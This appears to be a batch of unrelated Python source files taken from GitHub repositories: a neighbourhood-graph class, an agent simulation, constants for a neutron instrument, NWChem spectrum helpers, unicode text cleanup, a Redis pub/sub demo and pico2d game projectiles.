vectorDouble, vectorInt\n\n\nclass PrebuiltGraph(nglGraph):\n \"\"\"A neighborhood graph that represents the connectivity of a given\n data matrix.\n\n Attributes:\n None\n \"\"\"\n\n def __init__(self, edges=None, **kwargs):\n \"\"\"\n Constructor for the Prebuilt Graph class that takes a list of edges\n and as such should only be used for one dataset.\n\n Parameters\n ----------\n edges : list[tuple(int,int)]\n The predefined list of edges connecting a point set\n\n kwargs\n Forward-compatible catch-all dictionary that will allow us to throw\n a warning for every named parameter not available in this version.\n\n Returns\n -------\n None\n\n \"\"\"\n\n utils.consume_extra_args(kwargs)\n self.edges = edges\n\n def build(self, X):\n rows = len(X)\n cols = len(X[0]) if rows > 0 else 0\n\n flattened_X = [xij for Xi in X for xij in Xi]\n\n # use pairs to prevent duplicates\n # As seen here: https://bit.ly/1pUtpLh\n seen = set()\n pairs = [\n x for x in self.edges if not (x in seen or x[::-1] in seen or seen.add(x))\n ]\n edgeList = []\n for edge in pairs:\n edgeList.append(int(edge[0]))\n edgeList.append(int(edge[1]))\n edges = vectorInt(edgeList)\n\n super(PrebuiltGraph, self).__init__(\n vectorDouble(flattened_X),\n rows,\n cols,\n \"none\",\n rows,\n 0,\n edges,\n False,\n )\n\n def neighbors(self, idx=None):\n \"\"\"Returns the list of neighbors associated to a particular\n index in the dataset, if one is provided, otherwise a full\n dictionary is provided relating each index to a set of\n connected indices.\n\n Args:\n idx: (optional) a single index of the point in the input\n data matrix for which we want to retrieve neighbors.\n\n Returns:\n A list of indices connected to either the provided input\n index, or a dictionary where the keys are the indices in the\n whole dataset and the values are sets of indices connected\n to the key index.\n \"\"\"\n if idx is None:\n return dict(self.full_graph())\n else:\n return list(super(PrebuiltGraph, self).get_neighbors(int(idx)))\n","repo_name":"maljovec/nglpy","sub_path":"nglpy/PrebuiltGraph.py","file_name":"PrebuiltGraph.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"10659174235","text":"import time\r\nfrom threading import Thread\r\nfrom cellworld import *\r\nfrom Agent import Agent, AgentData, AgentAction\r\n\r\nclass Model:\r\n\r\n def __init__(self,\r\n pworld: World,\r\n freq: int = 100,\r\n real_time: bool = False):\r\n self.real_time = real_time\r\n self.world = pworld\r\n self.agents = dict()\r\n self.agents_data = dict()\r\n self.display = Display(self.world, animated=True, fig_size=(6, 6))\r\n self.thread = None\r\n self.running = False\r\n self.interval = 1 / freq\r\n self.arena_polygon = Polygon(self.world.implementation.space.center, 6,\r\n self.world.implementation.space.transformation.size / 2,\r\n self.world.implementation.space.transformation.rotation)\r\n self.occlusions_polygons = Polygon_list.get_polygons([c.location for c in self.world.cells.occluded_cells()],\r\n 6,\r\n self.world.implementation.cell_transformation.size / 2 * 1.05,\r\n self.world.implementation.cell_transformation.rotation)\r\n self.visibility = Location_visibility(occlusions=self.occlusions_polygons)\r\n\r\n def is_valid_location(self, plocation):\r\n if self.arena_polygon.contains(plocation):\r\n for p in self.occlusions_polygons:\r\n if p.contains(plocation):\r\n return False\r\n return True\r\n else:\r\n return False\r\n\r\n def run(self):\r\n self.running = True\r\n self.thread = Thread(target=self.__process__)\r\n self.thread.start()\r\n\r\n def __move_agent__(self, agent_name):\r\n agent = self.agents_data[agent_name]\r\n agent.theta = normalize(agent.theta + agent.turning_speed * self.interval)\r\n new_location = Location(agent.location.x, agent.location.y)\r\n new_location.move(theta=agent.theta, dist=agent.speed * self.interval)\r\n if self.is_valid_location(new_location):\r\n self.agents_data[agent_name].location = new_location\r\n\r\n def stop(self):\r\n if self.thread:\r\n self.running = False\r\n self.thread.join()\r\n\r\n def __process__(self):\r\n t = Timer(self.interval)\r\n while self.running:\r\n t.reset()\r\n self.step()\r\n if self.real_time:\r\n pending_wait = self.interval - t.to_seconds()\r\n if pending_wait > 0:\r\n time.sleep(pending_wait)\r\n\r\n\r\n def step(self):\r\n for agent_name in self.agents.keys():\r\n if self.agents_data[agent_name].auto_update:\r\n action = self.agents[agent_name].get_action(self.get_observation(agent_name))\r\n self.agents_data[agent_name].speed = action.speed\r\n self.agents_data[agent_name].turning_speed = action.turning_speed\r\n for agent_name in self.agents.keys():\r\n self.__move_agent__(agent_name)\r\n\r\n def set_agent_action(self, agent_name: str, action: AgentAction):\r\n self.agents_data[agent_name].speed = action.speed\r\n self.agents_data[agent_name].turning_speed = action.turning_speed\r\n\r\n def __create_observation__(self, agent_name: str) -> dict:\r\n observation = dict()\r\n src = self.agents_data[agent_name].location\r\n for dst_agent_name in self.agents_data:\r\n dst_agent_data = self.agents_data[dst_agent_name]\r\n if self.visibility.is_visible(src, dst_agent_data.location):\r\n observation[dst_agent_name] = dst_agent_data\r\n else:\r\n observation[dst_agent_name] = None\r\n return observation\r\n\r\n def get_observation(self, agent_name: str) -> dict:\r\n return self.__create_observation__(agent_name)\r\n\r\n def show(self):\r\n for agent_name in self.agents_data:\r\n agent_data = self.agents_data[agent_name]\r\n self.display.agent(agent_name=agent_name,\r\n location=agent_data.location,\r\n rotation=to_degrees(agent_data.theta),\r\n color=agent_data.color,\r\n size=15,\r\n show_trajectory=False)\r\n self.display.update()\r\n\r\n def set_agent_position(self, pagent_name: str,\r\n plocation: Location,\r\n ptheta: float):\r\n self.agents_data[pagent_name].location = plocation\r\n self.agents_data[pagent_name].theta = ptheta\r\n\r\n def add_agent(self,\r\n pagent_name: str,\r\n pagent: Agent,\r\n plocation: Location,\r\n ptheta: float,\r\n pcolor: str = \"b\",\r\n pauto_update: bool = True):\r\n self.agents[pagent_name] = pagent\r\n self.agents_data[pagent_name] = AgentData(plocation=plocation,\r\n ptheta=ptheta,\r\n pspeed=0,\r\n pturning_speed=0,\r\n pcolor=pcolor,\r\n pauto_update=pauto_update)\r\n self.display.set_agent_marker(pagent_name, Agent_markers.arrow())\r\n","repo_name":"germanespinosa/RL_Environment","sub_path":"prey_env/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42814716171","text":"import numpy as np\nimport instrument_context as instr\n\n# This code gives the global coefficients and methods for other code files regarding the Mushroom project. It will\n# not execute any commands and should be called by other code files.\n\nextension_pdf = \"pdf\"\nextension_png = \"png\"\nextension_dat = \"dat\"\n\npath_performance = \"Performance/\"\npath_resolution = \"Resolution/\"\npath_geometry = \"Geometry/\"\npath_mcstas = \"McStas/\"\n\nq_unit_real = r\"$\\AA^{-1}$\" # the real unit of Q-vector\nq_unit_rlu = \"r.l.u.\" # reciprocal lattice unit\ne_joule = \"joule\"\ne_mev = \"meV\"\nhw_label = r\"$\\hbar\\omega$ ({:s})\".format(e_mev)\n\naxis_x = \"x\"\naxis_y = \"y\"\naxis_z = \"z\"\naxes = [axis_x, axis_y, axis_z]\n\ncolour_x = \"blue\"\ncolour_y = \"red\"\ncolour_z = \"darkgoldenrod\"\nrotation_stepsize = np.deg2rad(1) # sample rotation step size\nrotation_steps = 90\nmagnon_default = \"Default\"\nsample_rot_axis = (0, 0, 1)\nl_interest = 1\nanimation_frames = 100\n\nprefix_mush = \"Mushroom\"\nprefix_mcstas = \"McStas\"\n\ncomment_symbol = \"#\"\nterm_hw = \"hw\"\n\npg_orders = [1, 2]\n\n\ndef fname_write_dispersion(prefix, ki, order, path):\n name = \"{:s}{:.3f}_PG00{:d}\".format(prefix, ki * 1e-10, int(2 * order))\n name = \"\".join([path, name])\n name = \".\".join([name, extension_dat])\n return name\n\n\ndef fname_lineplot(hkl, point_interest, extension):\n dim_info = \"[{:d}{:d}{:d}]({:d},{:d},{:d})\".format(*hkl, *point_interest)\n filename = \"Correlation_ki[{:.1f},{:.1f}]_{:s}.{:s}\".format(instr.wavenumber_in_min * 1e-10,\n instr.wavenumber_in_max * 1e-10, dim_info,\n extension)\n return \"\".join([path_performance, filename])\n\n\ndef write_q_hw(prefix, ki, q_vectors, mush_hw, order):\n filename = fname_write_dispersion(prefix, ki, order, path=path_performance)\n file = open(filename, \"w+\")\n file.write(\"# {:s} (joule) {:e}\\n\".format(term_hw, mush_hw))\n file.write(\"# Q_x, Q_y, Q_z (m^{-1})\\n\")\n for i in range(q_vectors.shape[1]):\n file.write(\"{:e}, {:e}, {:e}\\n\".format(*q_vectors[:, i]))\n # file.write(\"{:e}, {:e}, {:e}, {:e}, {:e}\\n\".format(*q_vetors[:, i], hw_mush[i], hw_mag[i]))\n file.close()\n print(\"File written in: {:s}\".format(filename))\n\n\ndef write_dispersion(prefix, ki, q_vectors, intensities, order):\n filename = fname_write_dispersion(prefix, ki, order, path=path_mcstas)\n file = open(filename, \"w+\")\n file.write(\"# Q_x, Q_y, Q_z (m^{-1}), Intensity\\n\")\n for i in range(q_vectors.shape[1]):\n file.write(\"{:e}, {:e}, {:e}, {:e}\\n\".format(*q_vectors[:, i], intensities[i]))\n # file.write(\"{:e}, {:e}, {:e}, {:e}, {:e}\\n\".format(*q_vetors[:, i], hw_mush[i], hw_mag[i]))\n file.close()\n print(\"File written in: {:s}\".format(filename))\n\n\nmcstas_ana_angles = np.linspace(start=5 + 7, stop=170 - 8, num=11).astype(int)\ntype_bcc = \"bcc\"\ntype_cp = \"cP\"\nzero_tol = 1e-6","repo_name":"rtang-sidney/Mushroom","sub_path":"global_context.py","file_name":"global_context.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22563368427","text":"import re\nimport os\nimport time\nfrom subprocess import call\nimport numpy as np\n#import matplotlib.pyplot as plt\n\n\ndef replace_text_in_file(infile, oldstr, newstr):\n # Read in the file\n with open(infile, 'r') as file:\n filedata = file.read()\n\n # Replace the target string\n filedata = filedata.replace(oldstr, newstr)\n\n # Write the file out again\n with open(infile, 'w') as file:\n file.write(filedata)\n\n\ndef find_highest_number_xyz_file(directory):\n numbers = []\n prefixes = []\n for filename in os.listdir(directory):\n match = re.match(r'(.*?)(\\d*)(.xyz)', filename)\n prefixes.append(match.group(1))\n numbers.append(match.group(2))\n assert all([p==prefixes[0] for p in prefixes]), 'Some filename prefixes do not match'\n numbers = [int(n) for n in numbers]\n return '{}{:03d}{}'.format(match.group(1), max(numbers), match.group(3))\n\n\ndef read_last_line(file):\n#https://stackoverflow.com/questions/3346430/what-is-the-most-efficient-way-to-get-first-and-last-line-of-a-text-file\n with open(file, \"rb\") as f:\n f.readline() # Read the first line.\n f.seek(-2, os.SEEK_END) # Jump to the second last byte.\n while f.read(1) != b\"\\n\": # Until EOL is found...\n f.seek(-2, os.SEEK_CUR) # ...jump back the read byte plus one more.\n last = f.readline() # Read last line.\n return last\n\n\ndef check_calculation_successful(outfile):\n try:\n res = read_last_line(outfile)[:12] == b' Total times'\n return res\n except IOError:\n return False\n\n\ndef get_highest_occupied_beta_movec(infile): #Deprecated, kept for backwards compatibility\n with open(infile, 'r') as f:\n content = f.read()\n betaorbitalsindex = content.index('DFT Final Beta Molecular Orbital Analysis')\n betaorbitals = content[betaorbitalsindex:]\n occ0index = betaorbitals.index('Occ=0')\n f.seek(betaorbitalsindex + occ0index)\n vectorindex = betaorbitals.index('Vector', occ0index - 14, occ0index)\n f.seek(betaorbitalsindex + vectorindex)\n r = f.readline()\n return int(r.split()[1]) - 1\n\n\ndef get_highest_occupied_movec(infile, channel='beta'):\n if channel == 'beta':\n channel = 'Beta'\n elif channel == 'alpha':\n channel = 'Alpha'\n else:\n raise RuntimeError('Channel must be \\'alpha\\' or \\'beta\\'')\n with open(infile, 'r') as f:\n content = f.read()\n orbitalsindex = content.index('DFT Final {} Molecular Orbital Analysis'.format(channel))\n orbitals = content[orbitalsindex:]\n occ0index = orbitals.index('Occ=0')\n f.seek(orbitalsindex + occ0index)\n vectorindex = orbitals.index('Vector', occ0index - 14, occ0index)\n f.seek(orbitalsindex + vectorindex)\n r = f.readline()\n return int(r.split()[1]) - 1\n\n\ndef get_number_alphas_betas(infile):\n res = {}\n with open(infile, 'r') as f:\n content = f.read()\n generalinfo = content[content.index('General Information') : content.index('XC Information')]\n res['alphas'] = int([s for s in generalinfo.splitlines() if 'Alpha' in s][0].split(':')[1])\n res['betas'] = int([s for s in generalinfo.splitlines() if 'Beta' in s][0].split(':')[1])\n return res\n\n\ndef start_job():\n return call(['msub', 'job.run'])\n\n\ndef wait_for_calculation_completion(outfilename, maxwait=3600*24):\n w = 0\n while not os.path.isfile(outfilename):\n print('waiting for job to start: {}s'.format(w), end='\\r')\n w = w + 1\n time.sleep(1)\n\n print('output file created. blocking for maxwait {}s'.format(maxwait))\n i = 0\n while not check_calculation_successful(outfilename):\n if i < maxwait:\n time.sleep(1)\n i = i + 1\n else:\n raise RuntimeError('Output file not created within {}s timeout period.'.format(maxwait))\n\n\ndef convert_mol_to_xyz(infile):\n name = infile.split('.mol')[0]\n with open(infile, 'r') as file:\n lines = file.readlines()\n\n istart = 0\n for l in lines:\n if 'V2000' in l.split() or 'V3000' in l.split():\n break\n else:\n istart = istart + 1\n\n atomre = re.compile(r'\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(\\w+)\\s+')\n atoms = []\n for l in lines[istart + 1:]:\n m = atomre.match(l)\n if m is not None:\n atoms.append(m.groups())\n else:\n break\n\n with open(name + '.xyz', 'w') as outfile:\n outfile.write(str(len(atoms)) + '\\n')\n outfile.write('File made automatically with Python script using input mol file. (v1)\\n')\n for a in atoms:\n outfile.write('{}{:>15}{:>15}{:>15}\\n'.format(a[-1], a[0], a[1], a[2]))\n\n\ndef center_xyz(infile, targetline):\n with open(infile, 'r') as file:\n with open(infile.split('.xyz')[0] + '_centered.xyz', 'w') as newfile:\n for i in range(targetline - 1):\n file.readline()\n target = file.readline().split()\n for i in range(1, len(target)):\n target[i] = float(target[i])\n\n file.seek(0)\n\n newfile.write(file.readline())\n newfile.write(file.readline())\n while True:\n r = file.readline().split()\n if len(r) != 4:\n break\n for i in range(1, len(r)):\n r[i] = float(r[i]) - target[i]\n newfile.write('{} {:>15.5f}{:>15.5f}{:>15.5f}\\n'.format(*r))\n newfile.write('\\n')\n return infile.split('.xyz')[0] + '_centered.xyz'\n\n\ndef read_xyz(file):\n with open(file, 'r') as f:\n lines = f.readlines()\n atoms = []\n coords = []\n for l in lines[2:]: #XYZ files must have two header rows\n split = l.split()\n atoms.append(split[0])\n coords.append([float(x) for x in split[1:]])\n assert len(atoms) == len(coords), 'Something went wrong, len of atoms doesnt equal length of coords'\n return atoms, coords\n\n\ndef basic_multiplicity_from_atoms(atoms):\n import periodictable\n electrons = 0\n for a in atoms:\n electrons += periodictable.__getattribute__(a).number\n print('{} electrons, which means basic multiplicity {}'.format(electrons, electrons % 2 + 1))\n return electrons % 2 + 1\n\n\ndef make_xyz_animation(basename, directory=None):\n if directory is None:\n directory = os.getcwd() + '/'\n \n filere = re.compile(r'{}\\d\\d\\d.xyz'.format(basename))\n \n xyzfiles = []\n for f in os.listdir(directory):\n if filere.match(f) is not None:\n xyzfiles.append(f)\n \n if not xyzfiles:\n raise FileNotFoundError('No files matching {}###.xyz were found.'.format(basename))\n \n assert not os.path.exists(directory+'{}animation.xyz'.format(basename)), 'File already exists'\n \n with open(directory+'{}animation.xyz'.format(basename), 'w') as outfile:\n for xyz in sorted(xyzfiles):\n with open(directory+xyz, 'r') as infile:\n outfile.write(infile.read())\n\n\n\ndef read_dft_transitions_file(path):\n return np.loadtxt(path).T\n\n\n#https://scipython.com/book/chapter-8-scipy/examples/the-voigt-profile/\ndef Lorentzian(x, xc, gamma):\n \"\"\" Return Lorentzian line shape at x with HWHM gamma \"\"\"\n return gamma / np.pi / ((x-xc)**2 + gamma**2)\n\n\ndef spectrum_from_transitions(transitions, lorentz_ev=1, erange=None, numpoints=1000, peaknorm=True):\n x, y = transitions\n if erange is not None:\n good = np.logical_and(x >= erange[0], x <= erange[1])\n x, y = x[good], y[good]\n x_eval = np.linspace(erange[0], erange[1], numpoints)\n else:\n xmin = np.min(x)\n xmax = np.max(x)\n padding = (xmax - xmin) / 2\n x_eval = np.linspace(xmin - padding, xmax + padding, numpoints)\n \n spectrum = np.zeros_like(x_eval)\n for e, a in zip(x, y):\n spectrum += a * Lorentzian(x_eval, e, lorentz_ev/2)\n \n if peaknorm:\n spectrum = spectrum / np.max(spectrum)\n\n return np.array([x_eval, spectrum])\n\n\n#Thank you stackoverflow\n#https://stackoverflow.com/questions/24143320/gaussian-sum-filter-for-irregular-spaced-points\ndef gaussian_broaden(spectrum, width_ev=2, numpoints=1000, xmin=None, xmax=None):\n x, y = spectrum\n if xmin is None:\n xmin = np.min(x)\n if xmax is None:\n xmax = np.max(x)\n x_eval = np.linspace(xmin, xmax, numpoints)\n sigma = width_ev/(2*np.sqrt(2*np.log(2)))\n\n delta_x = x_eval[:, None] - x\n weights = np.exp(-delta_x*delta_x / (2*sigma*sigma)) / (np.sqrt(2*np.pi) * sigma)\n weights /= np.sum(weights, axis=1, keepdims=True)\n y_eval = np.dot(weights, y)\n\n return np.array([x_eval, y_eval])\n\n\ndef plot_spectrum_and_transitions(transitions, lorentz_ev=1, erange=None, \n numpoints=1000, gaussian_ev=None, show=True):\n import matplotlib.pyplot as plt\n spectrum = spectrum_from_transitions(transitions, lorentz_ev=lorentz_ev, \n erange=erange, numpoints=numpoints, peaknorm=False)\n x, y = spectrum\n norm = np.max(y)\n\n fig, ax = plt.subplots()\n ax.plot(x, y / norm)\n\n #rescale so that stem matches spectral height\n rescale = Lorentzian(0, 0, lorentz_ev/2)\n xs, ys = transitions\n if erange is not None:\n good = np.logical_and(xs >= erange[0], xs <= erange[1])\n xs, ys = xs[good], ys[good]\n markerline, stemlines, baseline = ax.stem(xs, ys * rescale / norm, \n basefmt='k', linefmt='C0-')\n plt.setp(baseline, visible=False)\n plt.setp(stemlines, 'linewidth', 1)\n plt.setp(markerline, 'markersize', 3)\n plt.xlabel('Energy (eV)')\n\n if show:\n plt.show()\n\n return fig\n\n\n# def parse_roots_from_tddft_output(file):\n# with open(file, 'r') as f:\n# lines = f.readlines()\n \n# rootre = re.compile('Root\\s+\\d+')\n# transitionre = re.compile(r'\\s+Occ\\.\\s+(\\d+)\\s+(alpha|beta)\\s+\\w\\s+-+\\s+Virt.\\s+(\\d+)\\s+(alpha|beta)\\s+\\w\\s+(-?\\d+\\.\\d+)\\s+')\n \n# rootlinenums = []\n# for i, l in enumerate(lines):\n# if rootre.search(l):\n# rootlinenums.append(i)\n \n# rootdict = {}\n# for i in range(len(rootlinenums)):\n# rootdict[i + 1] = {}\n \n# for k, d in rootdict.items():\n# d['transitions'] = []\n# if k != len(rootdict):\n# lower = rootlinenums[k-1]\n# upper = rootlinenums[k]\n# else:\n# lower = rootlinenums[k-1]\n# upper = None\n# for l in lines[lower:upper]:\n# m = transitionre.match(l)\n# if m:\n# trans = {}\n# trans['occ ({})'.format(m.group(2))] = m.group(1)\n# trans['virt ({})'.format(m.group(4))] = m.group(3)\n# trans['coeff'] = float(m.group(5))\n# d['transitions'].append(trans)\n\n# dm = re.match(r'\\s+Dipole Oscillator Strength\\s+(-?\\d+\\.\\d+)\\s+', l)\n# if dm:\n# d['Dipole Oscillator Strength'] = float(dm.group(1))\n\n# qm = re.match(r'\\s+Electric Quadrupole\\s+(-?\\d+\\.\\d+)\\s+', l)\n# if qm:\n# d['Electric Quadrupole'] = float(qm.group(1))\n\n# mm = re.match(r'\\s+Magnetic Dipole\\s+(-?\\d+\\.\\d+)\\s+', l)\n# if mm:\n# d['Magnetic Dipole'] = float(mm.group(1))\n\n# tm = re.match(r'\\s+Total Oscillator Strength\\s+(-?\\d+\\.\\d+)\\s+', l)\n# if tm:\n# d['Total Oscillator Strength'] = float(tm.group(1))\n\n# auev = re.match(r'\\s+Root\\s+\\d+\\s+\\w\\s+(-?\\d+\\.\\d+)\\s+a.u.\\s+(-?\\d+\\.\\d+)\\s+eV\\s+', l)\n# if auev:\n# d['a.u.'] = auev.group(1)\n# d['eV'] = auev.group(2)\n\n# s2 = re.match(r'\\s+\\s+=\\s+(-?\\d+\\.\\d+)\\s+', l)\n# if s2:\n# d[''] = s2.group(1)\n \n# return rootdict\n\n\ndef write_xyz_from_atoms_coords(filename, atoms, coords, comment=None):\n if '.xyz' not in filename:\n filename += '.xyz'\n with open(filename, 'w') as outfile:\n outfile.write(str(len(atoms)) + '\\n')\n outfile.write('{}\\n'.format(comment))\n for a, c in zip(atoms, coords):\n outfile.write('{}{:>15.5f}{:>15.5f}{:>15.5f}\\n'.format(a, *c))\n\n\ndef take_erange(energies, intensities, erange):\n good = np.where(np.logical_and(energies < erange[1], energies > erange[0]))\n return np.array([energies[good], intensities[good]])\n\n\ndef integral_normalize(energies, intensities, erange):\n e, i = take_erange(energies, intensities, erange)\n return np.array([energies, intensities / np.sum(i)])\n\n\ndef integral_norm_over_erange(x, y, erange):\n good = np.where(np.logical_and(x>erange[0], x= erange[0], x <= erange[1])\n x, y = x[good], y[good]\n x_eval = np.linspace(erange[0], erange[1], numpoints)\n else:\n xmin = np.min(x)\n xmax = np.max(x)\n padding = (xmax - xmin) / 2\n x_eval = np.linspace(xmin - padding, xmax + padding, numpoints)\n \n spectrum = np.zeros_like(x_eval)\n \n #do proper energy scaling\n sy = x ** 2 * y\n y = sy / sy.sum()\n \n for e, a in zip(x, y):\n spectrum += a * Lorentzian(x_eval, e, lorentz_ev/2)\n \n if peaknorm:\n spectrum = spectrum / np.max(spectrum)\n\n return np.array([x_eval, spectrum])\n","repo_name":"wholden/NWChemScripting","sub_path":"NWChemScripting/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14837214988","text":"s = 'pýtĥöñ\\fis\\tawesome\\r\\n'\n\nremap = {\n ord('\\t') : ' ',\n ord('\\f') : ' ',\n ord('\\r') : None # Deleted\n}\n\na = s.translate(remap)\n\nimport unicodedata\nimport sys\ncmb_chrs = dict.fromkeys(c for c in range(sys.maxunicode) if unicodedata.combining(chr(c)))\nb = unicodedata.normalize('NFD', a)\nb.translate(cmb_chrs)\n\ndigitmap = { c: ord('0') + unicodedata.digit(chr(c)) for c in range(sys.maxunicode) if unicodedata.category(chr(c)) == 'Nd' }\n","repo_name":"tomtom0516/python-cookbook-3rd-edition","sub_path":"02 String and Text/B12unicodeclean.py","file_name":"B12unicodeclean.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"86573852831","text":"\nimport redis\nimport threading\nimport redisMQ\nimport json\n\n# redis连接\n\ndef shengchan(body):\n redisMQ.re_queue.publish(\"liao\", body)\n\n\ndef xioafei1():\n ps = redisMQ.re_queue.pubsub()\n ps.subscribe('liao') #从liao订阅消息\n for item in ps.listen(): #监听状态:有消息发布了就拿过来\n if item['type'] == 'message':\n #print(item['channel']) CORE BACKEND\n print(item['data'])\n print('11')\ndef xioafei2():\n ps = redisMQ.re_queue.pubsub()\n ps.subscribe('liao') #从liao订阅消息\n for item in ps.listen(): #监听状态:有消息发布了就拿过来\n if item['type'] == 'message':\n #print(item['channel']) CORE BACKEND\n print(item['data'])\n print('22')\nt3 = threading.Thread(target=xioafei1,)\nt3.start()\nt4 = threading.Thread(target=xioafei2,)\nt4.start()\n","repo_name":"wushiqi/post","sub_path":"thread_server.py","file_name":"thread_server.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23764458807","text":"from pico2d import*\nimport game_world\nimport game_framework\nimport particle\nimport unit_functions\n\nclass FlyingState:\n\n @staticmethod\n def enter(unit):\n pass\n\n @staticmethod\n def exit(unit):\n unit.search_unit_in_exploding_range()\n\n @staticmethod\n def do(unit):\n if unit.collide():\n unit.add_event(ExplodingState)\n\n unit.dir = math.atan2(unit.destination_y - unit.y, unit.destination_x - unit.x)\n\n unit.x += unit.RUN_SPEED_PPS * math.cos(unit.dir) * game_framework.frame_time\n unit.y += unit.RUN_SPEED_PPS * math.sin(unit.dir) * game_framework.frame_time\n\n unit.generate_smoke_time -= game_framework.frame_time\n if unit.generate_smoke_time <= 0:\n particle.Smoke(unit.x, unit.y)\n unit.generate_smoke_time += 0.08\n\n\n\n @staticmethod\n def draw(unit):\n cx, cy = unit_functions.get_cx_cy(unit.x, unit.y)\n\n unit.image.composite_draw( unit.dir, '', cx, cy, unit.IMAGE_SIZE, unit.IMAGE_SIZE)\n\n\nclass ExplodingState:\n\n @staticmethod\n def enter(unit):\n unit.explode_sound.play()\n particle.Explosion(unit.x, unit.y)\n game_world.remove_object(unit)\n\n @staticmethod\n def exit(unit):\n game_world.remove_object(unit)\n\n @staticmethod\n def do(unit):\n pass\n\n @staticmethod\n def draw(unit):\n pass\n\n\n\nclass BombProjectile:\n\n def __init__(self):\n self.IMAGE_SIZE = 0\n\n self.PIXEL_PER_METER = (100 / 0.02)\n self.RUN_SPEED_KMPH = 0.1\n self.RUN_SPEED_MPM = (self.RUN_SPEED_KMPH * 1000.0 / 60.0)\n self.RUN_SPEED_MPS = (self.RUN_SPEED_MPM / 60.0)\n self.RUN_SPEED_PPS = (self.RUN_SPEED_MPS * self.PIXEL_PER_METER)\n\n self.EXPLODING_TIME_PER_ACTION = 0.3\n self.EXPLODING_ACTION_PER_TIME = 1.0 / self.EXPLODING_TIME_PER_ACTION\n self.EXPLODING_FRAMES_PER_ACTION = 4\n\n self.generate_smoke_time = 0\n\n self.valid_target_list = []\n self.target = None\n self.frame = 0\n self.init_time = 0\n self.radius = 0\n\n self.x, self.y = 0, 0\n self.destination_x, self.destination_y = 0, 0\n self.dir = 0\n self.damage = 0\n\n self.event_que = []\n self.cur_state = FlyingState\n\n self.explode_sound = None\n\n def add_self(self):\n game_world.add_object(self, 4)\n\n def attack_target(self, o):\n o.hp -= self.damage\n\n def search_unit_in_exploding_range(self):\n if (self.valid_target_list is None) is False:\n for o in self.valid_target_list:\n if self.collide_explosion_radius(o):\n self.attack_target(o)\n\n def collide(self):\n if self.destination_x - 20 > self.x: return False\n if self.destination_y + 20 < self.y: return False\n if self.destination_x + 20 < self.x: return False\n if self.destination_y - 20 > self.y: return False\n return True\n\n def collide_explosion_radius(self, o):\n left, bottom, right, top = o.get_bb()\n if self.x - self.radius > right: return False\n if self.y + self.radius < bottom: return False\n if self.x + self.radius < left: return False\n if self.y - self.radius > top: return False\n return True\n\n\n######################################################################\n\n def add_event(self, event):\n self.event_que.insert(0, event)\n\n def update(self):\n self.cur_state.do(self)\n if len(self.event_que) > 0:\n event = self.event_que.pop()\n self.cur_state.exit(self)\n self.cur_state = event\n self.cur_state.enter(self)\n\n def draw(self):\n self.cur_state.draw(self)\n\n\n\n\nclass ProjectileBazookaBug(BombProjectile):\n image = None\n\n def __init__(self, x, y, target, vaild_target_list, damage):\n self.IMAGE_SIZE = 50\n\n self.PIXEL_PER_METER = (100 / 0.02)\n self.RUN_SPEED_KMPH = 0.2\n self.RUN_SPEED_MPM = (self.RUN_SPEED_KMPH * 1000.0 / 60.0)\n self.RUN_SPEED_MPS = (self.RUN_SPEED_MPM / 60.0)\n self.RUN_SPEED_PPS = (self.RUN_SPEED_MPS * self.PIXEL_PER_METER)\n\n self.generate_smoke_time = 0.1\n\n self.valid_target_list = vaild_target_list\n self.target = target\n self.frame = 0\n self.init_time = 0\n self.radius = 40\n\n self.x, self.y = x, y\n self.destination_x, self.destination_y = target.x, target.y\n self.dir = math.atan2(self.destination_y - self.y, self.destination_x - self.x)\n\n self.damage = damage\n\n self.event_que = []\n self.cur_state = FlyingState\n\n self.explode_sound = load_wav('resource\\\\sound\\\\bomb_explosion.wav')\n self.explode_sound.set_volume(50)\n\n if ProjectileBazookaBug.image is None:\n ProjectileBazookaBug.image = load_image('resource\\\\image\\\\projectile\\\\bazooka_bomb.png')\n\n self.add_self()\n\n\nclass ProjectileBomBardDragonFly(BombProjectile):\n image = None\n\n def __init__(self, x, y, target, vaild_target_list, damage):\n self.IMAGE_SIZE = 90\n\n self.PIXEL_PER_METER = (100 / 0.02)\n self.RUN_SPEED_KMPH = 0.2\n self.RUN_SPEED_MPM = (self.RUN_SPEED_KMPH * 1000.0 / 60.0)\n self.RUN_SPEED_MPS = (self.RUN_SPEED_MPM / 60.0)\n self.RUN_SPEED_PPS = (self.RUN_SPEED_MPS * self.PIXEL_PER_METER)\n\n self.generate_smoke_time = 0.1\n\n self.valid_target_list = vaild_target_list\n self.target = target\n self.frame = 0\n self.init_time = 0\n self.radius = 50\n\n self.x, self.y = x, y\n self.destination_x, self.destination_y = target.x, target.y\n\n if self.x <= self.destination_x:\n self.dir = 0\n else:\n self.dir= math.pi\n\n self.damage = damage\n\n self.event_que = []\n self.cur_state = FlyingState\n\n self.explode_sound = load_wav('resource\\\\sound\\\\bomb_explosion.wav')\n self.explode_sound.set_volume(32)\n self.fire_sound = load_wav('resource\\\\sound\\\\bomb_fall.wav')\n self.fire_sound.set_volume(20)\n\n if ProjectileBomBardDragonFly.image is None:\n ProjectileBomBardDragonFly.image = load_image('resource\\\\image\\\\projectile\\\\dragon_bomb.png')\n\n self.add_self()\n\n self.fire_sound.play()\n","repo_name":"hitmontop/2dgame","sub_path":"unit_bomb_projectile.py","file_name":"unit_bomb_projectile.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71709863787","text":"import logging\nimport time\nfrom collections import Counter\n\nmillis = lambda: time.time()*1000\n\nlogger = 